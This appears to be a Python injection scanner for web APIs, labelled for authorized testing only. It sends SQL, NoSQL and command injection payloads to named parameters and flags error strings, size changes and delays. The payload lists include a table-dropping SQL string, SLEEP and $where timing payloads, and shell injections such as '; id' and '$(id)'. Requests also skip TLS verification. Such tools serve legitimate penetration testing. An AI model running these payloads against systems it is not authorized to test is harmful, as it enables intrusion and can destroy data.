#!/usr/bin/env python3 """Agent for testing API injection vulnerabilities (SQL, NoSQL, command injection).""" import argparse import json import urllib.parse from datetime import datetime, timezone try: import requests HAS_REQUESTS = True except ImportError: HAS_REQUESTS = False SQL_PAYLOADS = [ "' OR '1'='1", "' OR 1=1--", "'; DROP TABLE users;--", "' UNION SELECT NULL,NULL--", "1' AND SLEEP(5)--", "admin'--", "' OR ''='", ] NOSQL_PAYLOADS = [ '{"$gt":""}', '{"$ne":""}', '{"$regex":".*"}', '{"$where":"sleep(5000)"}', ] COMMAND_INJECTION_PAYLOADS = [ "; id", "| whoami", "$(id)", "`id`", "; sleep 5", "| sleep 5", ] ERROR_SIGNATURES = { "sql": ["sql syntax", "mysql", "postgresql", "sqlite", "ora-", "mssql", "unclosed quotation", "quoted string not properly terminated"], "nosql": ["bson", "mongodb", "mongoerror", "json parse error"], "command": ["sh:", "bash:", "/bin/", "command not found", "uid="], } def test_parameter(url, param_name, param_value, payloads, method="GET", headers=None): """Test a single parameter with injection payloads.""" if not HAS_REQUESTS: return [] findings = [] baseline_url = f"{url}?{param_name}={urllib.parse.quote(param_value)}" try: baseline = requests.get(baseline_url, headers=headers, timeout=10, verify=False) baseline_len = len(baseline.text) baseline_time = baseline.elapsed.total_seconds() except requests.RequestException: return findings for payload in payloads: test_value = urllib.parse.quote(payload) try: if method == "GET": test_url = f"{url}?{param_name}={test_value}" resp = requests.get(test_url, headers=headers, timeout=15, verify=False) else: data = {param_name: payload} resp = requests.post(url, json=data, headers=headers, timeout=15, verify=False) resp_text = resp.text.lower() indicators = [] for category, sigs in ERROR_SIGNATURES.items(): for sig in sigs: if sig in resp_text: indicators.append(f"{category}_error: {sig}") if abs(len(resp.text) - baseline_len) > baseline_len * 0.5 and baseline_len > 0: indicators.append(f"Response size anomaly: {baseline_len} -> {len(resp.text)}") if resp.elapsed.total_seconds() > baseline_time + 4: indicators.append(f"Time-based: {resp.elapsed.total_seconds():.1f}s vs baseline {baseline_time:.1f}s") if indicators: findings.append({ "parameter": param_name, "payload": payload, "status_code": resp.status_code, "indicators": indicators, }) except requests.RequestException: continue return findings def scan_api_endpoint(url, params, method="GET", headers=None): """Scan an API endpoint with all injection categories.""" all_findings = [] for param_name, param_value in params.items(): all_findings.extend(test_parameter(url, param_name, param_value, SQL_PAYLOADS, method, headers)) all_findings.extend(test_parameter(url, param_name, param_value, NOSQL_PAYLOADS, method, headers)) all_findings.extend(test_parameter(url, param_name, param_value, COMMAND_INJECTION_PAYLOADS, method, headers)) return all_findings def main(): parser = argparse.ArgumentParser( description="Test API endpoints for injection vulnerabilities (authorized testing only)" ) parser.add_argument("--url", required=True, help="Target API endpoint URL") parser.add_argument("--params", required=True, help="Parameters as key=value,key2=value2") parser.add_argument("--method", default="GET", choices=["GET", "POST"]) parser.add_argument("--header", nargs="*", help="Custom headers as Key:Value") parser.add_argument("--output", "-o", help="Output JSON report") args = parser.parse_args() print("[*] API Injection Testing Agent") print("[!] For authorized security testing only") params = dict(p.split("=", 1) for p in args.params.split(",")) headers = {} if args.header: for h in args.header: k, _, v = h.partition(":") headers[k.strip()] = v.strip() findings = scan_api_endpoint(args.url, params, args.method, headers or None) report = { "timestamp": datetime.now(timezone.utc).isoformat(), "target": args.url, "parameters_tested": list(params.keys()), "findings": findings, "vulnerability_count": len(findings), "risk_level": "CRITICAL" if findings else "LOW", } print(f"[*] Tested {len(params)} parameters, found {len(findings)} potential injections") if args.output: with open(args.output, "w") as f: json.dump(report, f, indent=2) print(f"[*] Report saved to {args.output}") else: print(json.dumps(report, indent=2)) if __name__ == "__main__": main()